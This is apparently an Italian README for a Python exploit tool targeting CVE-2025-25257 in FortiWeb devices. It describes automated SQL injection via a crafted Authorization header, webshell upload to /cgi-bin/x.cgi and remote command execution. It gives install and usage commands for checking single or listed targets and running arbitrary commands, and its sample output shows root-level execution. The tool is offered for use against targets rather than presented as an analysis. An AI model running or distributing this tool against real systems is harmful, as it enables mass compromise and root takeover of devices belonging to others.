
Strumento di exploit basato su Python per CVE-2025-25257 in FortiWeb. Automatizza il rilevamento di SQL injection, il caricamento di webshell e l'esecuzione remota di comandi su bersagli vulnerabili.
Uno strumento basato su Python per verificare e sfruttare la vulnerabilità CVE-2025-25257 nei dispositivi FortiWeb. Questa vulnerabilità consente l'iniezione SQL e l'esecuzione remota di codice tramite un'intestazione Authorization appositamente predisposta.
CVE-2025-25257 è una vulnerabilità critica nei dispositivi FortiWeb che consente:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Verifica un singolo target:
python3 vuln_check.py -t https://target.com
Verifica più target da un file:
python3 vuln_check.py -l target.txt
exp.py)Esegui comandi su un target vulnerabile:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - Verificatore principale delle vulnerabilità e strumento di sfruttamentoexp.py - Strumento di esecuzione comandi per target vulnerabilitarget.txt - Elenco di esempio di target (sostituisci con il tuo)vuln.txt - File di output con target vulnerabili (generato dopo la scansione)/api/fabric/device/status/cgi-bin/x.cgiLo strumento genera un file vuln.txt contenente:
Esempio di output:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
crediti:0xbigshaq